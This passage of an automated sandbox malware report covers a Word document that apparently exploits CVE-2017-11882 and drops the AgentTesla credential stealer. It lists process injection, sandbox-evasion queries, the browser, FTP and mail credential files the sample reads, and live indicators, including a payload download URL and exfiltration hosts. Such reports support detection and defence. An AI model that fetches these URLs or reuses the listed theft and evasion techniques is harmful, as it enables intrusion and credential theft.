              Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe TID: 2304Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe TID: 2784Thread sleep time: -300000s >= -30000s
              Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe TID: 2812Thread sleep time: -3689348814741908s >= -30000s
              Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe TID: 2812Thread sleep time: -120000s >= -30000s
              Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exeWMI Queries: IWbemServices::CreateInstanceEnum - Win32_Processor
              Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
              Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
              Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
              Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
              Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
              Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
              Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
              Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
              Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
              Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
              Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
              Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
              Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exeProcess information queried: ProcessInformation
              Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exeCode function: 6_2_00403918 LdrInitializeThunk,
              Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exeProcess token adjusted: Debug
              Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exeProcess token adjusted: Debug
              Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exeMemory allocated: page read and write | page guard

              HIPS / PFW / Operating System Protection Evasion:

              barindex
              Injects a PE file into a foreign processesShow sources
              Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exeMemory written: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe base: 400000 value starts with: 4D5A
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe
              Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exeProcess created: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe
              Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exeProcess created: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe
              Source: poiuytrewsdfghjklmnbvcx.exe, 00000006.00000002.2349455339.0000000001230000.00000002.00000001.sdmpBinary or memory string: Program Manager
              Source: poiuytrewsdfghjklmnbvcx.exe, 00000006.00000002.2349455339.0000000001230000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
              Source: poiuytrewsdfghjklmnbvcx.exe, 00000006.00000002.2349455339.0000000001230000.00000002.00000001.sdmpBinary or memory string: !Progman
              Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exeQueries volume information: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe VolumeInformation
              Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exeQueries volume information: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe VolumeInformation
              Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
              Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
              Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exeRegistry key created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 BlobJump to behavior

              Stealing of Sensitive Information:

              barindex
              Yara detected AgentTeslaShow sources
              Source: Yara matchFile source: 00000006.00000002.2349919507.0000000002A53000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000006.00000002.2349497357.0000000002631000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000006.00000002.2348944194.0000000000402000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000002.2107988603.0000000003C6A000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000006.00000002.2349585582.00000000026EE000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000006.00000002.2349941343.0000000002A84000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: poiuytrewsdfghjklmnbvcx.exe PID: 2712, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: poiuytrewsdfghjklmnbvcx.exe PID: 2572, type: MEMORY
              Source: Yara matchFile source: 6.2.poiuytrewsdfghjklmnbvcx.exe.400000.0.unpack, type: UNPACKEDPE
              Tries to harvest and steal browser information (history, passwords, etc)Show sources
              Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
              Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
              Tries to harvest and steal ftp login credentialsShow sources
              Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites\Quick Connect\
              Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exeFile opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml
              Tries to steal Mail credentials (via file access)Show sources
              Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
              Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
              Source: Yara matchFile source: 00000006.00000002.2349497357.0000000002631000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000006.00000002.2349585582.00000000026EE000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: poiuytrewsdfghjklmnbvcx.exe PID: 2712, type: MEMORY

              Remote Access Functionality:

              barindex
              Yara detected AgentTeslaShow sources
              Source: Yara matchFile source: 00000006.00000002.2349919507.0000000002A53000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000006.00000002.2349497357.0000000002631000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000006.00000002.2348944194.0000000000402000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000002.2107988603.0000000003C6A000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000006.00000002.2349585582.00000000026EE000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000006.00000002.2349941343.0000000002A84000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: poiuytrewsdfghjklmnbvcx.exe PID: 2712, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: poiuytrewsdfghjklmnbvcx.exe PID: 2572, type: MEMORY
              Source: Yara matchFile source: 6.2.poiuytrewsdfghjklmnbvcx.exe.400000.0.unpack, type: UNPACKEDPE

              Mitre Att&ck Matrix

              Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
              Valid AccountsWindows Management Instrumentation211Path InterceptionProcess Injection112Masquerading1OS Credential Dumping2Security Software Discovery11Remote ServicesEmail Collection1Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
              Default AccountsExploitation for Client Execution13Boot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsVirtualization/Sandbox Evasion13Input Capture11Query Registry1Remote Desktop ProtocolInput Capture11Exfiltration Over BluetoothNon-Standard Port1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
              Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Disable or Modify Tools11Security Account ManagerVirtualization/Sandbox Evasion13SMB/Windows Admin SharesArchive Collected Data11Automated ExfiltrationIngress Tool Transfer12Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
              Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Process Injection112NTDSProcess Discovery2Distributed Component Object ModelData from Local System2Scheduled TransferNon-Application Layer Protocol2SIM Card SwapCarrier Billing Fraud
              Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptDeobfuscate/Decode Files or Information1LSA SecretsApplication Window Discovery1SSHClipboard Data1Data Transfer Size LimitsApplication Layer Protocol132Manipulate Device CommunicationManipulate App Store Rankings or Ratings
              Replication Through Removable MediaLaunchdRc.commonRc.commonSteganographyCached Domain CredentialsRemote System Discovery1VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
              External Remote ServicesScheduled TaskStartup ItemsStartup ItemsCompile After DeliveryDCSyncFile and Directory Discovery1Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
              Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc FilesystemSystem Information Discovery114Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue

              Behavior Graph

              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet
              behaviorgraph top1 signatures2 2 Behavior Graph ID: 345163 Sample: Pending Orders Statement -4... Startdate: 27/01/2021 Architecture: WINDOWS Score: 100 36 Found malware configuration 2->36 38 Multi AV Scanner detection for submitted file 2->38 40 Yara detected AgentTesla 2->40 42 6 other signatures 2->42 7 EQNEDT32.EXE 11 2->7         started        12 WINWORD.EXE 291 27 2->12         started        process3 dnsIp4 30 cybersng.duckdns.org 172.111.202.41, 49167, 80 BLACKNIGHT-ASIE United States 7->30 32 cy.kl-re.com 7->32 24 C:\Users\user\...\poiuytrewsdfghjklmnbvcx.exe, PE32 7->24 dropped 26 C:\Users\user\AppData\Local\...\boobov[1].exe, PE32 7->26 dropped 52 Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802) 7->52 14 poiuytrewsdfghjklmnbvcx.exe 12 7->14         started        file5 signatures6 process7 dnsIp8 34 193.239.147.103, 49168, 80 DEDIPATH-LLCUS Brunei Darussalam 14->34 54 Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines) 14->54 56 Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines) 14->56 58 Injects a PE file into a foreign processes 14->58 18 poiuytrewsdfghjklmnbvcx.exe 4 14->18         started        22 poiuytrewsdfghjklmnbvcx.exe 14->22         started        signatures9 process10 dnsIp11 28 mail.privateemail.com 198.54.122.60, 49169, 49170, 49172 NAMECHEAP-NETUS United States 18->28 44 Tries to steal Mail credentials (via file access) 18->44 46 Tries to harvest and steal ftp login credentials 18->46 48 Tries to harvest and steal browser information (history, passwords, etc) 18->48 50 Installs a global keyboard hook 18->50 signatures12

              Screenshots

              Thumbnails

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.

              windows-stand

              Antivirus, Machine Learning and Genetic Malware Detection

              Initial Sample

              SourceDetectionScannerLabelLink
              Pending Orders Statement -40064778.doc42%VirustotalBrowse
              Pending Orders Statement -40064778.doc48%ReversingLabsDocument-RTF.Exploit.CVE-2017-11882

              Dropped Files

              No Antivirus matches

              Unpacked PE Files

              SourceDetectionScannerLabelLinkDownload
              6.2.poiuytrewsdfghjklmnbvcx.exe.400000.0.unpack100%AviraHEUR/AGEN.1138205Download File

              Domains

              SourceDetectionScannerLabelLink
              cybersng.duckdns.org0%VirustotalBrowse
              cy.kl-re.com4%VirustotalBrowse

              URLs

              SourceDetectionScannerLabelLink
              http://crt.sectigo.com/SectigoRSADomainValidationSecureServerCA.crt0#0%URL Reputationsafe
              http://crt.sectigo.com/SectigoRSADomainValidationSecureServerCA.crt0#0%URL Reputationsafe
              http://crt.sectigo.com/SectigoRSADomainValidationSecureServerCA.crt0#0%URL Reputationsafe
              http://crt.sectigo.com/SectigoRSADomainValidationSecureServerCA.crt0#0%URL Reputationsafe
              http://127.0.0.1:HTTP/1.10%Avira URL Cloudsafe
              http://DynDns.comDynDNS0%URL Reputationsafe
              http://DynDns.comDynDNS0%URL Reputationsafe
              http://DynDns.comDynDNS0%URL Reputationsafe
              http://DynDns.comDynDNS0%URL Reputationsafe
              http://crl.oces.certifikat.dk/oces.crl00%URL Reputationsafe
              http://crl.oces.certifikat.dk/oces.crl00%URL Reputationsafe
              http://crl.oces.certifikat.dk/oces.crl00%URL Reputationsafe
              http://crl.oces.certifikat.dk/oces.crl00%URL Reputationsafe
              http://fedir.comsign.co.il/crl/ComSignCA.crl00%URL Reputationsafe
              http://fedir.comsign.co.il/crl/ComSignCA.crl00%URL Reputationsafe
              http://fedir.comsign.co.il/crl/ComSignCA.crl00%URL Reputationsafe
              http://fedir.comsign.co.il/crl/ComSignCA.crl00%URL Reputationsafe
              https://sectigo.com/CPS00%URL Reputationsafe
              https://sectigo.com/CPS00%URL Reputationsafe
              https://sectigo.com/CPS00%URL Reputationsafe
              https://sectigo.com/CPS00%URL Reputationsafe
              http://crl.chambersign.org/chambersroot.crl00%URL Reputationsafe
              http://crl.chambersign.org/chambersroot.crl00%URL Reputationsafe
              http://crl.chambersign.org/chambersroot.crl00%URL Reputationsafe
              http://crl.chambersign.org/chambersroot.crl00%URL Reputationsafe
              http://ocsp.sectigo.com00%URL Reputationsafe
              http://ocsp.sectigo.com00%URL Reputationsafe
              http://ocsp.sectigo.com00%URL Reputationsafe
              http://ocsp.sectigo.com00%URL Reputationsafe
              https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha0%URL Reputationsafe
              https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha0%URL Reputationsafe
              https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha0%URL Reputationsafe
              https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha0%URL Reputationsafe
              http://ocsp.entrust.net030%URL Reputationsafe
              http://ocsp.entrust.net030%URL Reputationsafe
              http://ocsp.entrust.net030%URL Reputationsafe
              http://ocsp.entrust.net030%URL Reputationsafe
              http://ca.sia.it/seccli/repository/CRL.der0J0%URL Reputationsafe
              http://ca.sia.it/seccli/repository/CRL.der0J0%URL Reputationsafe
              http://ca.sia.it/seccli/repository/CRL.der0J0%URL Reputationsafe
              http://ca.sia.it/seccli/repository/CRL.der0J0%URL Reputationsafe
              http://www.digsigtrust.com/DST_TRUST_CPS_v990701.html00%URL Reputationsafe
              http://www.digsigtrust.com/DST_TRUST_CPS_v990701.html00%URL Reputationsafe
              http://www.digsigtrust.com/DST_TRUST_CPS_v990701.html00%URL Reputationsafe
              http://www.digsigtrust.com/DST_TRUST_CPS_v990701.html00%URL Reputationsafe
              http://cps.chambersign.org/cps/chambersroot.html00%URL Reputationsafe
              http://cps.chambersign.org/cps/chambersroot.html00%URL Reputationsafe
              http://cps.chambersign.org/cps/chambersroot.html00%URL Reputationsafe
              http://cps.chambersign.org/cps/chambersroot.html00%URL Reputationsafe
              http://www.certificadodigital.com.br/repositorio/serasaca/crl/SerasaCAI.cr0%Avira URL Cloudsafe
              http://www.chambersign.org10%URL Reputationsafe
              http://www.chambersign.org10%URL Reputationsafe
              http://www.chambersign.org10%URL Reputationsafe
              http://www.chambersign.org10%URL Reputationsafe
              http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl00%URL Reputationsafe
              http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl00%URL Reputationsafe
              http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl00%URL Reputationsafe
              http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl00%URL Reputationsafe
              http://www.diginotar.nl/cps/pkioverheid00%URL Reputationsafe
              http://www.diginotar.nl/cps/pkioverheid00%URL Reputationsafe
              http://www.diginotar.nl/cps/pkioverheid00%URL Reputationsafe
              http://www.diginotar.nl/cps/pkioverheid00%URL Reputationsafe
              https://ca.sia.it/seccli/repository/CPS/0%Avira URL Cloudsafe
              http://fedir.comsign.co.il/cacert/ComSignAdvancedSecurityCA.crt00%URL Reputationsafe
              http://fedir.comsign.co.il/cacert/ComSignAdvancedSecurityCA.crt00%URL Reputationsafe
              http://fedir.comsign.co.il/cacert/ComSignAdvancedSecurityCA.crt00%URL Reputationsafe
              http://fedir.comsign.co.il/cacert/ComSignAdvancedSecurityCA.crt00%URL Reputationsafe
              http://crl.chambersign.org/publicnotaryroot.crl00%URL Reputationsafe
              http://crl.chambersign.org/publicnotaryroot.crl00%URL Reputationsafe
              http://crl.chambersign.org/publicnotaryroot.crl00%URL Reputationsafe
              http://crl.chambersign.org/publicnotaryroot.crl00%URL Reputationsafe
              http://cy.kl-re.com//power/bo/boobov.exe0%Avira URL Cloudsafe
              http://crl.pkioverheid.nl/DomOvLatestCRL.crl00%URL Reputationsafe
              http://crl.pkioverheid.nl/DomOvLatestCRL.crl00%URL Reputationsafe
              http://crl.pkioverheid.nl/DomOvLatestCRL.crl00%URL Reputationsafe
              http://crl.pkioverheid.nl/DomOvLatestCRL.crl00%URL Reputationsafe
              http://www.sk.ee/juur/crl/00%URL Reputationsafe
              http://www.sk.ee/juur/crl/00%URL Reputationsafe
              http://www.sk.ee/juur/crl/00%URL Reputationsafe
              http://www.sk.ee/juur/crl/00%URL Reputationsafe
              http://crl.xrampsecurity.com/XGCA.crl00%URL Reputationsafe
              http://crl.xrampsecurity.com/XGCA.crl00%URL Reputationsafe
              http://crl.xrampsecurity.com/XGCA.crl00%URL Reputationsafe
              http://crl.xrampsecurity.com/XGCA.crl00%URL Reputationsafe
              http://fedir.comsign.co.il/crl/ComSignAdvancedSecurityCA.crl00%URL Reputationsafe
              http://fedir.comsign.co.il/crl/ComSignAdvancedSecurityCA.crl00%URL Reputationsafe
              http://fedir.comsign.co.il/crl/ComSignAdvancedSecurityCA.crl00%URL Reputationsafe
              http://fedir.comsign.co.il/crl/ComSignAdvancedSecurityCA.crl00%URL Reputationsafe
              http://193.239.147.103/base/9158412CBF14FB744AFA9F0D01F6CDF2.html0%Avira URL Cloudsafe
              http://duylfM.com0%Avira URL Cloudsafe
              http://www.sk.ee/cps/00%URL Reputationsafe
              http://www.sk.ee/cps/00%URL Reputationsafe
              http://www.sk.ee/cps/00%URL Reputationsafe
              http://www.valicert.com/10%URL Reputationsafe
              http://www.valicert.com/10%URL Reputationsafe
              http://www.valicert.com/10%URL Reputationsafe
              http://www.%s.comPA0%URL Reputationsafe
              http://www.%s.comPA0%URL Reputationsafe
              http://www.%s.comPA0%URL Reputationsafe
              https://xWUrFiDn0aBmFXBFM.net0%Avira URL Cloudsafe

              Domains and IPs

              Contacted Domains

              NameIPActiveMaliciousAntivirus DetectionReputation
              cybersng.duckdns.org
              		172.111.202.41
              		truetrueunknown
              mail.privateemail.com
              		198.54.122.60
              		truefalse
                		high
                cy.kl-re.com
                		unknown
                		unknownfalseunknown

                Contacted URLs

                NameMaliciousAntivirus DetectionReputation
                http://cy.kl-re.com//power/bo/boobov.exetrue
                • Avira URL Cloud: safe
                		unknown
                http://193.239.147.103/base/9158412CBF14FB744AFA9F0D01F6CDF2.htmlfalse
                • Avira URL Cloud: safe
                		unknown
                https://xWUrFiDn0aBmFXBFM.nettrue
                • Avira URL Cloud: safe
                		unknown

                URLs from Memory and Binaries

                NameSourceMaliciousAntivirus DetectionReputation
                http://crt.sectigo.com/SectigoRSADomainValidationSecureServerCA.crt0#poiuytrewsdfghjklmnbvcx.exe, 00000006.00000002.2349668008.00000000027AA000.00000004.00000001.sdmpfalse
                • URL Reputation: safe
                • URL Reputation: safe
                • URL Reputation: safe
                • URL Reputation: safe
                		unknown
                http://127.0.0.1:HTTP/1.1poiuytrewsdfghjklmnbvcx.exe, 00000006.00000002.2349497357.0000000002631000.00000004.00000001.sdmpfalse
                • Avira URL Cloud: safe
                		low
                http://DynDns.comDynDNSpoiuytrewsdfghjklmnbvcx.exe, 00000006.00000002.2349497357.0000000002631000.00000004.00000001.sdmpfalse
                • URL Reputation: safe
                • URL Reputation: safe
                • URL Reputation: safe
                • URL Reputation: safe
                		unknown
                http://crl.oces.certifikat.dk/oces.crl0poiuytrewsdfghjklmnbvcx.exe, 00000006.00000002.2353099899.00000000064A9000.00000004.00000001.sdmpfalse
                • URL Reputation: safe
                • URL Reputation: safe
                • URL Reputation: safe
                • URL Reputation: safe
                		unknown
                http://fedir.comsign.co.il/crl/ComSignCA.crl0poiuytrewsdfghjklmnbvcx.exe, 00000006.00000002.2353099899.00000000064A9000.00000004.00000001.sdmpfalse
                • URL Reputation: safe
                • URL Reputation: safe
                • URL Reputation: safe
                • URL Reputation: safe
                		unknown
                https://sectigo.com/CPS0poiuytrewsdfghjklmnbvcx.exe, 00000006.00000002.2349668008.00000000027AA000.00000004.00000001.sdmpfalse
                • URL Reputation: safe
                • URL Reputation: safe
                • URL Reputation: safe
                • URL Reputation: safe
                		unknown
                http://crl.chambersign.org/chambersroot.crl0poiuytrewsdfghjklmnbvcx.exe, 00000006.00000002.2353099899.00000000064A9000.00000004.00000001.sdmpfalse
                • URL Reputation: safe
                • URL Reputation: safe
                • URL Reputation: safe
                • URL Reputation: safe
                		unknown
                http://crl.entrust.net/server1.crl0poiuytrewsdfghjklmnbvcx.exe, 00000006.00000002.2353024476.00000000063F0000.00000004.00000001.sdmpfalse
                  		high
                  http://ocsp.sectigo.com0poiuytrewsdfghjklmnbvcx.exe, 00000006.00000002.2349668008.00000000027AA000.00000004.00000001.sdmpfalse
                  • URL Reputation: safe
                  • URL Reputation: safe
                  • URL Reputation: safe
                  • URL Reputation: safe
                  		unknown
                  https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%hapoiuytrewsdfghjklmnbvcx.exe, 00000006.00000002.2349497357.0000000002631000.00000004.00000001.sdmpfalse
                  • URL Reputation: safe
                  • URL Reputation: safe
                  • URL Reputation: safe
                  • URL Reputation: safe
                  		unknown
                  http://ocsp.entrust.net03poiuytrewsdfghjklmnbvcx.exe, 00000006.00000002.2353024476.00000000063F0000.00000004.00000001.sdmpfalse
                  • URL Reputation: safe
                  • URL Reputation: safe
                  • URL Reputation: safe
                  • URL Reputation: safe
                  		unknown
                  http://ca.sia.it/seccli/repository/CRL.der0Jpoiuytrewsdfghjklmnbvcx.exe, 00000006.00000002.2353089225.0000000006498000.00000004.00000001.sdmpfalse
                  • URL Reputation: safe
                  • URL Reputation: safe
                  • URL Reputation: safe
                  • URL Reputation: safe
                  		unknown
                  http://www.certicamara.com/dpc/0Zpoiuytrewsdfghjklmnbvcx.exe, 00000006.00000002.2358404346.0000000008390000.00000004.00000001.sdmpfalse
                    		high
                    http://www.digsigtrust.com/DST_TRUST_CPS_v990701.html0poiuytrewsdfghjklmnbvcx.exe, 00000006.00000002.2353099899.00000000064A9000.00000004.00000001.sdmpfalse
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    		unknown
                    http://cps.chambersign.org/cps/chambersroot.html0poiuytrewsdfghjklmnbvcx.exe, 00000006.00000002.2353099899.00000000064A9000.00000004.00000001.sdmpfalse
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    		unknown
                    http://www.certificadodigital.com.br/repositorio/serasaca/crl/SerasaCAI.crpoiuytrewsdfghjklmnbvcx.exe, 00000006.00000002.2353099899.00000000064A9000.00000004.00000001.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    http://www.chambersign.org1poiuytrewsdfghjklmnbvcx.exe, 00000006.00000002.2353099899.00000000064A9000.00000004.00000001.sdmpfalse
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    		unknown
                    http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0poiuytrewsdfghjklmnbvcx.exe, 00000006.00000002.2353024476.00000000063F0000.00000004.00000001.sdmpfalse
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    		unknown
                    http://www.diginotar.nl/cps/pkioverheid0poiuytrewsdfghjklmnbvcx.exe, 00000006.00000002.2353024476.00000000063F0000.00000004.00000001.sdmpfalse
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    		unknown
                    https://ca.sia.it/seccli/repository/CPS/poiuytrewsdfghjklmnbvcx.exe, 00000006.00000002.2353089225.0000000006498000.00000004.00000001.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    http://fedir.comsign.co.il/cacert/ComSignAdvancedSecurityCA.crt0poiuytrewsdfghjklmnbvcx.exe, 00000006.00000002.2353099899.00000000064A9000.00000004.00000001.sdmpfalse
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    		unknown
                    http://mail.privateemail.compoiuytrewsdfghjklmnbvcx.exe, 00000006.00000002.2349668008.00000000027AA000.00000004.00000001.sdmpfalse
                      		high
                      http://crl.chambersign.org/publicnotaryroot.crl0poiuytrewsdfghjklmnbvcx.exe, 00000006.00000002.2353099899.00000000064A9000.00000004.00000001.sdmpfalse
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      		unknown
                      http://crl.pkioverheid.nl/DomOvLatestCRL.crl0poiuytrewsdfghjklmnbvcx.exe, 00000006.00000002.2353024476.00000000063F0000.00000004.00000001.sdmpfalse
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      		unknown
                      http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.poiuytrewsdfghjklmnbvcx.exe, 00000004.00000002.2113733519.00000000056C0000.00000002.00000001.sdmp, poiuytrewsdfghjklmnbvcx.exe, 00000006.00000002.2351747130.0000000005C50000.00000002.00000001.sdmpfalse
                        		high
                        http://www.sk.ee/juur/crl/0poiuytrewsdfghjklmnbvcx.exe, 00000006.00000002.2358404346.0000000008390000.00000004.00000001.sdmpfalse
                        • URL Reputation: safe
                        • URL Reputation: safe
                        • URL Reputation: safe
                        • URL Reputation: safe
                        		unknown
                        http://crl.xrampsecurity.com/XGCA.crl0poiuytrewsdfghjklmnbvcx.exe, 00000006.00000002.2353099899.00000000064A9000.00000004.00000001.sdmpfalse
                        • URL Reputation: safe
                        • URL Reputation: safe
                        • URL Reputation: safe
                        • URL Reputation: safe
                        		unknown
                        http://www.e-certchile.cl/html/productos/download/CPSv1poiuytrewsdfghjklmnbvcx.exe, 00000006.00000002.2358404346.0000000008390000.00000004.00000001.sdmpfalse
                          		high
